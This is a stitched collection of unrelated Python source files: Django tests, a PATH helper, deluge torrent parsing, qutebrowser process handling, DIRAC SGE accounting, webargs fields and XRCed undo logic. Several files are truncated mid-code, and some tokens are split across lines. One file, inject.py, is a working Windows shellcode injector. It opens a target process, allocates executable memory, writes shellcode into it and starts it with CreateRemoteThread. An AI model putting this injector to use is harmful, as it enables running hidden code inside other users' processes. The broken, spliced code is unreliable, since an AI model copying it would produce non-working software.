@pytest.mark.parametrize("manage", [True, False, None])
def test_north_manage_migrations(mocker, settings, manage):
if manage is not None:
settings.NORTH_MANAGE_DB = manage
if manage is None and hasattr(settings, 'NORTH_MANAGE_DB'):
del settings.NORTH_MANAGE_DB
mock = mocker.patch('septentrion.show_migrations', return_value=b'')
call_command('showmigrations')
assert mock.called == bool(manage)
def test_showmigrations_schema_not_inited(capsys, mocker):
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
# schema not inited
mock_version.return_value = None
call_command('showmigrations')
captured = capsys.readouterr()
assert 'Current version is None' in captured.out
def test_showmigrations_schema(capsys, mocker):
# schema inited
mock_version = mocker.patch(
'septentrion.db.get_current_schema_version')
mock_version.return_value = septentrion.versions.Version.from_string('1.1')
mock_plan = mocker.patch(
'septentrion.core.build_migration_plan')
mock_plan.return_value = [
{
'version': "Version 1.2",
'plan': [
('a-ddl.sql', True, '/somewhere/a-ddl.sql', False),
('b-ddl.sql', False, '/somewhere/b-ddl.sql', True),
]
},
{
'version': "Version 1.3",
'plan': [
('c-ddl.sql', False, '/somewhere/c-ddl.sql', False),
]
}
]
call_command('showmigrations')
captured = capsys.readouterr()
assert "Current version is 1.1" in captured.out
assert "Target version is 1.3" in captured.out
assert "Version 1.2" in captured.out
assert "[X] \x1b[0ma-ddl.sql" in captured.out
assert "[ ] \x1b[0mb-ddl.sql" in captured.out
assert "Version 1.3" in captured.out
assert "[ ] \x1b[0mc-ddl.sql" in captured.out
Coriolan8/python_traning | test/test_add_group.py | Python | apache-2.0 | 824 | 0.01335 |
# -*- coding: utf-8 -*-
from model.group import Group
def test_add_group(app):
old_groups = app.group.get_group_list()
group = (Group(name="fdsasdaf", header="group", footer="group"))
app.group.create(group)
assert len(old_groups) + 1 == app.group.count()
new_groups = app.group.get_group_list()
old_groups.append(group)
assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
#def test_add_empty_group(app):
# old_groups = app.group.get_group_list()
# group = (Group(name="", header="", footer=""))
# app.group.create(group)
# new_groups = app.group.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
CSGreater-Developers/HMC-Grader | app/userViews/admin/__init__.py | Python | mit | 36 | 0 |
# coding=utf-8
__all__ = ['admin']
jalanb/jab | src/python/add_to_a_path.py | Python | mit | 3,399 | 0 |
"""Script to display a collection of paths after inserting one new path
Usage:
add_to_a_path.py [-U] PATHS PATH
add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH
Options:
-h, --help Show this help and exit
-v, --version Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
print('%s %s' % (sys.argv[0], __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
if not args.index:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
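# Worked example (illustrative values): with paths = ['/bin', '/usr/bin'],
# _add_symbol_to_paths(paths, '/usr/local/bin', 0) returns
# ['/usr/local/bin', '/bin', '/usr/bin']; passing i=False appends at the end
# instead, because i is then reset to len(paths).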
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
ztane/jaspyx | jaspyx/visitor/if_else.py | Python | mit | 809 | 0 |
from __future__ import absolute_import, division, print_function
import _ast
from jaspyx.context.block import BlockContext
from jaspyx.visitor import BaseVisitor
class IfElse(BaseVisitor):
def visit_If(self, node, skip_indent=False):
if not skip_indent:
self.indent()
self.output('if(')
self.visit(node.test)
self.output(') ')
self.block(node.body, context=BlockContext(self.stack[-1]))
if node.orelse:
self.output(' else ')
if len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If):
self.visit_If(node.orelse[0], True)
else:
self.block(node.orelse, context=BlockContext(self.stack[-1]))
self.output('\n')
else:
self.output('\n')
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/mock_django/signals.py | Python | agpl-3.0 | 1,028 | 0 |
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mocked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
>>> assert receiver.call_count == 1
"""
if wraps is None:
def wraps(*args, **kwargs):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
coolbombom/CouchPotatoServer | couchpotato/core/notifications/synoindex/main.py | Python | gpl-3.0 | 1,093 | 0.009149 |
from couchpotato.core.event import addEvent
from couchpotato.core.logger import CPLog
from couchpotato.core.notifications.base import Notification
import os
import subprocess
log = CPLog(__name__)
class Synoindex(Notification):
index_path = '/usr/syno/bin/synoindex'
def __init__(self):
super(Synoindex, self).__init__()
addEvent('renamer.after', self.addToLibrary)
def addToLibrary(self, message = None, group = {}):
if self.isDisabled(): return
command = [self.index_path, '-A', group.get('destination_dir')]
log.info('Executing synoindex command: %s ', command)
try:
p = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
out = p.communicate()
log.info('Result from synoindex: %s', str(out))
return True
except OSError, e:
log.error('Unable to run synoindex: %s', e)
return False
return True
def test(self, **kwargs):
return {
'success': os.path.isfile(self.index_path)
}
laanwj/deluge | deluge/ui/common.py | Python | gpl-3.0 | 13,980 | 0.001431 |
# -*- coding: utf-8 -*-
#
# deluge/ui/common.py
#
# Copyright (C) Damien Churchill 2008-2009 <damoxc@gmail.com>
# Copyright (C) Andrew Resch 2009 <andrewresch@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""
The ui common module contains methods and classes that are deemed useful for
all the interfaces.
"""
import os
import sys
import urlparse
import locale
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from deluge import bencode
from deluge.common import decode_string, path_join
from deluge.log import LOG as log
import deluge.configmanager
class TorrentInfo(object):
"""
Collects information about a torrent file.
:param filename: The path to the torrent
:type filename: string
"""
def __init__(self, filename, filetree=1):
# Get the torrent data from the torrent file
try:
log.debug("Attempting to open %s.", filename)
self.__m_filedata = open(filename, "rb").read()
self.__m_metadata = bencode.bdecode(self.__m_filedata)
except Exception, e:
log.warning("Unable to open %s: %s", filename, e)
raise e
self.__m_info_hash = sha(bencode.bencode(self.__m_metadata["info"])).hexdigest()
# Get encoding from torrent file if available
self.encoding = "UTF-8"
if "encoding" in self.__m_metadata:
self.encoding = self.__m_metadata["encoding"]
elif "codepage" in self.__m_metadata:
self.encoding = str(self.__m_metadata["codepage"])
# Check if 'name.utf-8' is in the torrent and if not try to decode the string
# using the encoding found.
if "name.utf-8" in self.__m_metadata["info"]:
self.__m_name = decode_string(self.__m_metadata["info"]["name.utf-8"])
else:
self.__m_name = decode_string(self.__m_metadata["info"]["name"], self.encoding)
# Get list of files from torrent info
paths = {}
dirs = {}
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for index, f in enumerate(self.__m_metadata["info"]["files"]):
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
f["index"] = index
paths[path] = f
dirname = os.path.dirname(path)
while dirname:
dirinfo = dirs.setdefault(dirname, {})
dirinfo["length"] = dirinfo.get("length", 0) + f["length"]
dirname = os.path.dirname(dirname)
if filetree == 2:
def walk(path, item):
if item["type"] == "dir":
item.update(dirs[path])
else:
item.update(paths[path])
item["download"] = True
file_tree = FileTree2(paths.keys())
file_tree.walk(walk)
else:
def walk(path, item):
if type(item) is dict:
return item
return [paths[path]["index"], paths[path]["length"], True]
file_tree = FileTree(paths)
file_tree.walk(walk)
self.__m_files_tree = file_tree.get_tree()
else:
if filetree == 2:
self.__m_files_tree = {
"contents": {
self.__m_name: {
"type": "file",
"index": 0,
"length": self.__m_metadata["info"]["length"],
"download": True
}
}
}
else:
self.__m_files_tree = {
self.__m_name: (0, self.__m_metadata["info"]["length"], True)
}
self.__m_files = []
if self.__m_metadata["info"].has_key("files"):
prefix = ""
if len(self.__m_metadata["info"]["files"]) > 1:
prefix = self.__m_name
for f in self.__m_metadata["info"]["files"]:
if "path.utf-8" in f:
path = os.path.join(prefix, *f["path.utf-8"])
else:
path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding)
self.__m_files.append({
'path': path,
'size': f["length"],
'download': True
})
else:
self.__m_files.append({
"path": self.__m_name,
"size": self.__m_metadata["info"]["length"],
"download": True
})
def as_dict(self, *keys):
"""
Return the torrent info as a dictionary, only including the passed in
keys.
:param keys: a number of key strings
:type keys: string
"""
return dict([(key, getattr(self, key)) for key in keys])
@property
def name(self):
"""
The name of the torrent.
:rtype: string
"""
return self.__m_name
@property
def info_hash(self):
"""
The torrents info_hash
:rtype: string
"""
return self.__m_info_hash
@property
def files(self):
"""
A list of the files that the torrent contains.
:rtype: list
"""
return self.__m_files
@property
def files_tree(self):
"""
A dictionary based tree of the files.
::
{
"some_directory": {
"some_file": (index, size, download)
}
}
:rtype: dictionary
"""
return self.__m_files_tree
@property
def metadata(self):
"""
The torrents metadata.
:rtype: dictionary
"""
return self.__m_metadata
@property
def filedata(self):
"""
The torrents file data. This will be the bencoded dictionary read
from the torrent file.
:rtype: string
"""
return self.__m_filedata
class FileTree2(object):
"""
Converts a list of paths in to a file tree.
:param paths: The paths to be converted
:type paths: list
"""
def __init__(self, paths):
self.tree = {"contents": {}, "type": "dir"}
def get_parent(path):
parent = self.tree
while "/" in path:
directory, path
forkbong/qutebrowser | qutebrowser/misc/guiprocess.py | Python | gpl-3.0 | 6,787 | 0 |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""A QProcess which shows notifications in the GUI."""
import locale
import shlex
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QObject, QProcess,
QProcessEnvironment)
from qutebrowser.utils import message, log, utils
from qutebrowser.browser import qutescheme
class GUIProcess(QObject):
"""An external process which shows notifications in the GUI.
Args:
cmd: The command which was started.
args: A list of arguments which gets passed.
verbose: Whether to show more messages.
_output_messages: Show output as messages.
_started: Whether the underlying process is started.
_proc: The underlying QProcess.
_what: What kind of thing is spawned (process/editor/userscript/...).
Used in messages.
Signals:
error/finished/started signals proxied from QProcess.
"""
error = pyqtSignal(QProcess.ProcessError)
finished = pyqtSignal(int, QProcess.ExitStatus)
started = pyqtSignal()
def __init__(self, what, *, verbose=False, additional_env=None,
output_messages=False, parent=None):
super().__init__(parent)
self._what = what
self.verbose = verbose
self._output_messages = output_messages
self._started = False
self.cmd = None
self.args = None
self._proc = QProcess(self)
self._proc.errorOccurred.connect(self._on_error)
self._proc.errorOccurred.connect(self.error)
self._proc.finished.connect(self._on_finished)
self._proc.finished.connect(self.finished)
self._proc.started.connect(self._on_started)
self._proc.started.connect(self.started)
if additional_env is not None:
procenv = QProcessEnvironment.systemEnvironment()
for k, v in additional_env.items():
procenv.insert(k, v)
self._proc.setProcessEnvironment(procenv)
@pyqtSlot(QProcess.ProcessError)
def _on_error(self, error):
"""Show a message if there was an error while spawning."""
if error == QProcess.Crashed and not utils.is_windows:
# Already handled via ExitStatus in _on_finished
return
msg = self._proc.errorString()
message.error("Error while spawning {}: {}".format(self._what, msg))
@pyqtSlot(int, QProcess.ExitStatus)
def _on_finished(self, code, status):
"""Show a message when the process finished."""
self._started = False
log.procs.debug("Process finished with code {}, status {}.".format(
code, status))
encoding = locale.getpreferredencoding(do_setlocale=False)
stderr = self._proc.readAllStandardError().data().decode(
encoding, 'replace')
stdout = self._proc.readAllStandardOutput().data().decode(
encoding, 'replace')
if self._output_messages:
if stdout:
message.info(stdout.strip())
if stderr:
message.error(stderr.strip())
if status == QProcess.CrashExit:
exitinfo = "{} crashed.".format(self._what.capitalize())
message.error(exitinfo)
elif status == QProcess.NormalExit and code == 0:
exitinfo = "{} exited successfully.".format(
self._what.capitalize())
if self.verbose:
message.info(exitinfo)
else:
assert status == QProcess.NormalExit
# We call this 'status' here as it makes more sense to the user -
# it's actually 'code'.
exitinfo = ("{} exited with status {}, see :messages for "
"details.").format(self._what.capitaliz
|
e(), code)
message.error(exitinfo)
if stdout:
log.procs.error("Process stdout:\n" + stdout.strip())
if stderr:
log.procs.error("Process stderr:\n" + stderr.strip())
qutescheme.spawn_output = self._spawn_format(exitinfo, stdout, stderr)
def _spawn_format(self, exitinfo, stdout, stderr):
"""Produce a formatted string for spawn output."""
stdout = (stdout or "(No output)").strip()
stderr = (stderr or "(No output)").strip()
spawn_string = ("{}\n"
"\nProcess stdout:\n {}"
"\nProcess stderr:\n {}").format(exitinfo,
stdout, stderr)
return spawn_string
@pyqtSlot()
def _on_started(self):
"""Called when the process started successfully."""
log.procs.debug("Process started.")
assert not self._started
self._started = True
def _pre_start(self, cmd, args):
"""Prepare starting of a QProcess."""
if self._started:
raise ValueError("Trying to start a running QProcess!")
self.cmd = cmd
self.args = args
fake_cmdline = ' '.join(shlex.quote(e) for e in [cmd] + list(args))
log.procs.debug("Executing: {}".format(fake_cmdline))
if self.verbose:
message.info('Executing: ' + fake_cmdline)
def start(self, cmd, args):
"""Convenience wrapper around QProcess::start."""
log.procs.debug("Starting process.")
self._pre_start(cmd, args)
self._proc.start(cmd, args)
self._proc.closeWriteChannel()
def start_detached(self, cmd, args):
"""Convenience wrapper around QProcess::startDetached."""
log.procs.debug("Starting detached.")
self._pre_start(cmd, args)
ok, _pid = self._proc.startDetached(
cmd, args, None) # type: ignore[call-arg]
if not ok:
message.error("Error while spawning {}".format(self._what))
return False
log.procs.debug("Process started.")
self._started = True
return True
def exit_status(self):
return self._proc.exitStatus()
idkwim/snippets | inject.py | Python | mit | 956 | 0.034519 |
# First parameter is the path to a binary file containing the instructions (shellcode) to be injected
# Second parameter is the process identifier (PID) of the process to inject into
import binascii
import sys
from ctypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.
|
argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
bytes = c_ubyte()
windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes))
handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle)
ic-hep/DIRAC | src/DIRAC/Resources/Computing/BatchSystems/TimeLeft/SGEResourceUsage.py | Python | gpl-3.0 | 4,887 | 0.001432 |
""" The SGE TimeLeft utility interrogates the SGE batch system for the
current CPU consumed, as well as its limit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import re
import time
import socket
from DIRAC import S_OK, S_ERROR
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.TimeLeft import runCommand
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.ResourceUsage import ResourceUsage
class SGEResourceUsage(ResourceUsage):
"""
This is the SGE plugin of the TimeLeft Utility
"""
def __init__(self):
"""Standard constructor"""
super(SGEResourceUsage, self).__init__("SGE", "JOB_ID")
self.queue = os.environ.get("QUEUE")
sgePath = os.environ.get("SGE_BINARY_PATH")
if sgePath:
os.environ["PATH"] += ":" + sgePath
self.log.verbose("JOB_ID=%s, QUEUE=%s" % (self.jobID, self.queue))
self.startTime = time.time()
def getResourceUsage(self):
"""Returns S_OK with a dictionary containing the entries CPU, CPULimit,
WallClock, WallClockLimit, and Unit for current slot.
"""
cmd = "qstat -f -j %s" % (self.jobID)
result = runCommand(cmd)
if not result["OK"]:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage.*cpu.*", line):
match = re.search(r"cpu=([\d,:]*),", line)
if match:
cpuList = match.groups()[0].split(":")
try:
newcpu = 0.0
if len(cpuList) == 3:
newcpu = float(cpuList[0]) * 3600 + float(cpuList[1]) * 60 + float(cpuList[2])
elif len(cpuList) == 4:
newcpu = (
float(cpuList[0]) * 24 * 3600
+ float(cpuList[1]) * 3600
+ float(cpuList[2]) * 60
+ float(cpuList[3])
)
if not cpu or newcpu > cpu:
cpu = newcpu
except ValueError:
self.log.warn('Problem parsing "%s" for CPU consumed' % line)
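# Worked example of the parsing above (qstat output line is illustrative):
# "cpu=1:02:03," splits into ["1", "02", "03"], giving
# 1*3600 + 2*60 + 3 = 3723 seconds; a four-field value such as
# "cpu=2:01:02:03," adds a days component: 2*86400 + 3723 = 176523 seconds.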
if re.search("hard resource_list.*cpu.*", line):
match = re.search(r"_cpu=(\d*)", line)
if match:
cpuLimit = float(match.groups()[0])
match = re.search(r"_rt=(\d*)", line)
if match:
wallClockLimit = float(match.groups()[0])
else:
self.log.warn("No hard limits found")
# Some SGE batch systems apply CPU scaling factor to the CPU consumption figures
if cpu:
factor = _getCPUScalingFactor()
if factor:
cpu = cpu / factor
consumed = {"CPU": cpu, "CPULimit": cpuLimit, "WallClock": wallClock, "WallClockLimit": wallClockLimit}
if None in consumed.values():
missed = [key for key, val in consumed.items() if val is None]
msg = "Could not determine parameter"
self.log.warn("Could not determine parameter", ",".join(missed))
self.log.debug("This is the stdout from the batch system call\n%s" % (result["Value"]))
else:
self.log.debug("TimeLeft counters complete:", str(consumed))
if cpuLimit or wallClockLimit:
# We have got a partial result from SGE
if not cpuLimit:
# Take some margin
consumed["CPULimit"] = wallClockLimit * 0.8
if not wallClockLimit:
consumed["WallClockLimit"] = cpuLimit / 0.8
if not cpu:
consumed["CPU"] = time.time() - self.startTime
if not wallClock:
consumed["WallClock"] = time.time() - self.startTime
self.log.debug("TimeLeft counters restored:", str(consumed))
return S_OK(consumed)
else:
msg = "Could not determine necessary parameters"
self.log.info(msg, ":\nThis is the stdout from the batch system call\n%s" % (result["Value"]))
retVal = S_ERROR(msg)
retVal["Value"] = consumed
return retVal
def _getCPUScalingFactor():
host = socket.getfqdn()
cmd = "qconf -se %s" % host
result = runCommand(cmd)
if not result["OK"]:
return None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage_scaling", line):
match = re.search(r"cpu=([\d,\.]*),", line)
if match:
return float(match.groups()[0])
return None
daspots/dasapp | lib/webargs/fields.py | Python | mit | 2,488 | 0.00201 |
# -*- coding: utf-8 -*-
"""Field classes.
Includes all fields from `marshmallow.fields` in addition to a custom
`Nested` field and `DelimitedList`.
All fields can optionally take a special `location` keyword argument, which tells webargs
where to parse the request argument from. ::
args = {
'active': fields.Bool(location='query')
'content_type': fields.Str(load_from='Content-Type',
location='headers')
}
"""
import marshmallow as ma
from webargs.core import argmap2schema
__all__ = [
'Nested',
'DelimitedList',
]
# Expose all fields from marshmallow.fields.
# We do this instead of 'from marshmallow.fields import *' because webargs
# has its own subclass of Nested
for each in (field_name for field_name in ma.fields.__all__ if field_name != 'Nested'):
__all__.append(each)
globals()[each] = getattr(ma.fields, each)
class Nested(ma.fields.Nested):
"""Same as `marshmallow.fields.Nested`, except can be passed a dictionary as
the first argument, which will be converted to a `marshmallow.Schema`.
"""
def __init__(self, nested, *args, **kwargs):
if isinstance(nested, dict):
nested = argmap2schema(nested)
super(Nested, self).__init__(nested, *args, **kwargs)
class DelimitedList(ma.fields.List):
"""Same as `marshmallow.fields.List`, except can load from either a list or
a delimited string (e.g. "foo,bar,baz").
:param Field cls_or_instance: A field class or instance.
:param str delimiter: Delimiter between values.
:param bool as_string: Dump values to string.
"""
delimiter = ','
def __init__(self, cls_or_instance, delimiter=None, as_string=False, **kwargs):
self.delimiter = delimiter or self.delimiter
self.as_string = as_string
super(DelimitedList, self).__init__(cls_or_instance, **kwargs)
def _serialize(self, value, attr, obj):
ret = super(DelimitedList, self)._serialize(value, attr, obj)
if self.as_string:
return self.delimiter.join(format(each) for each in value)
return ret
def _deserialize(self, value, attr, data):
try:
ret = (
value
if ma.utils.is_iterable_but_not_string(value)
else value.split(self.delimiter)
)
except AttributeError:
self.fail('invalid')
return super(DelimitedList, self)._deserialize(ret, attr, data)
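# Hedged usage sketch (not part of the original module): DelimitedList accepts
# either form of input, assuming a marshmallow Int inner field.
# >>> field = DelimitedList(ma.fields.Int())
# >>> field.deserialize('1,2,3')
# [1, 2, 3]
# >>> field.deserialize([1, 2, 3])
# [1, 2, 3]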
ktan2020/legacy-automation | win/Lib/site-packages/wx-3.0-msw/wx/tools/XRCed/undo.py | Python | mit | 7,307 | 0.005748
# Name: undo.py
# Purpose: XRC editor, undo/redo module
# Author: Roman Rolinsky <rolinsky@mema.ucl.ac.be>
# Created: 01.12.2002
# RCS-ID: $Id: undo.py 54812 2008-07-29 13:39:00Z ROL $
from globals import *
import view
from component import Manager
from model import Model
undo_depth = 10 # max number of undo remembered
# Undo/redo classes
class UndoManager:
# Undo/redo stacks
undo = []
redo = []
def RegisterUndo(self, undoObj):
TRACE('RegisterUndo: %s', undoObj.label)
self.undo.append(undoObj)
while len(self.undo) > undo_depth: self.undo.pop(0)
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def GetUndoLabel(self):
return self.undo[-1].label
def GetRedoLabel(self):
return self.redo[-1].label
def Undo(self):
undoObj = self.undo.pop()
undoObj.undo()
self.redo.append(undoObj)
view.frame.SetStatusText('Undone')
Presenter.setModified()
self.UpdateToolHelp()
def Redo(self):
undoObj = self.redo.pop()
undoObj.redo()
self.undo.append(undoObj)
view.frame.SetStatusText('Redone')
Presenter.setModified()
self.UpdateToolHelp()
def Clear(self):
map(Undo.destroy, self.undo)
self.undo = []
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def CanUndo(self):
return bool(self.undo)
def CanRedo(self):
return bool(self.redo)
def UpdateToolHelp(self):
if g.undoMan.CanUndo():
msg = 'Undo ' + self.GetUndoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_UNDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_UNDO, msg)
if g.undoMan.CanRedo():
msg = 'Redo ' + self.GetRedoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_REDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_REDO, msg)
class Undo:
'''ABC for Undo*.'''
def redo(self): # usually redo is same as undo
self.undo()
def destroy(self):
pass
class UndoCutDelete(Undo):
label = 'cut/delete'
def __init__(self, itemIndex, state, node):
self.itemIndex = itemIndex
self.state = state
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
Presenter.unselect()
# Updating DOM. Find parent node first
parentItem = view.tree.ItemAtFullIndex(self.itemIndex[:-1])
parentNode = view.tree.GetPyData(parentItem)
parentComp = Manager.getNodeComp(parentNode)
nextItem = view.tree.ItemAtFullIndex(self.itemIndex)
if nextItem:
nextNode = parentComp.getTreeOrImplicitNode(view.tree.GetPyData(nextItem))
else:
nextNode = None
# Insert before next
parentNode.insertBefore(self.node, nextNode)
# Remember test window item
if view.testWin.item is not None:
testItemIndex = view.tree.ItemFullIndex(view.testWin.item)
# Update tree and presenter
view.tree.FlushSubtree(parentItem, parentNode)
view.tree.SetFullState(self.state)
# Restore test window item
if view.testWin.item is not None:
view.testWin.item = view.tree.ItemAtFullIndex(testItemIndex)
item = view.tree.ItemAtFullIndex(self.itemIndex)
view.tree.EnsureVisible(item)
# This will generate events
view.tree.SelectItem(item)
def redo(self):
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
self.node = Presenter.delete(item)
# Undoing paste/create is the opposite of cut/delete, so we can reuse
# UndoCutDelete class swapping undo<->redo
class UndoPasteCreate(UndoCutDelete):
label = 'paste/create'
# The ctor is different because node is not known initially
def __init__(self, itemIndex, state):
self.itemIndex = itemIndex # new item index
self.state = state # tree state
self.node = None
undo = UndoCutDelete.redo
redo = UndoCutDelete.undo
class UndoReplace(Undo):
label = 'replace'
def __init__(self, itemIndex, comp, node):
self.itemIndex = itemIndex
self.comp = comp
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
# Replace current node with old node
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
comp = self.comp
node = self.node
data = wx.TreeItemData(node)
parentItem = view.tree.GetItemParent(item)
parentNode = view.tree.GetPyData(parentItem)
self.node = view.tree.GetPyData(item)
self.comp = Presenter.comp
Presenter.container.replaceChild(parentNode, node, self.node)
# Replace tree item: insert new, remove old
label = comp.getTreeText(node)
imageId = comp.getTreeImageId(node)
item = view.tree.InsertItem(parentItem, item, label, imageId, data=data)
view.tree.Delete(view.tree.GetPrevSibling(item))
Presenter.item = item
# Add children
for n in filter(is_object, node.childNodes):
view.tree.AddNode(item, comp.getTreeNode(n))
view.tree.EnsureVisible(item)
# Update panel
view.tree.SelectItem(item)
Presenter.setModified()
class UndoEdit(Undo):
'''Undo class for using in AttributePanel.'''
label = 'edit'
def __init__(self, item, page):
self.index = view.tree.ItemFullIndex(item)
self.page = page
panel = view.panel.nb.GetPage(page).panel
self.values = panel.GetValues()
def undo(self):
# Go back to the previous item
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.index)
Presenter.setData(item)
panel = view.panel.nb.GetPage(self.page).panel
values = panel.GetValues()
panel.SetValues(self.values)
Presenter.update(item)
self.values = values
view.tree.SelectItem(item)
class UndoGlobal(Undo):
'''Undo class storing a copy of the complete tree. Can be used for
non-frequent operations to avoid programming special undo
classes.'''
label = 'global'
def __init__(self):
self.mainNode = Model.mainNode.cloneNode(True)
self.state = view.tree.GetFullState()
def destroy(self):
self.mainNode.unlink()
def undo(self):
# Exchange
Model.mainNode,self.mainNode = \
self.mainNode,Model.dom.replaceChild(self.mainNode, Model.mainNode)
# Replace testElem
Model.testElem = Model.mainNode.childNodes[0]
state = view.tree.GetFullState()
Presenter.flushSubtree()
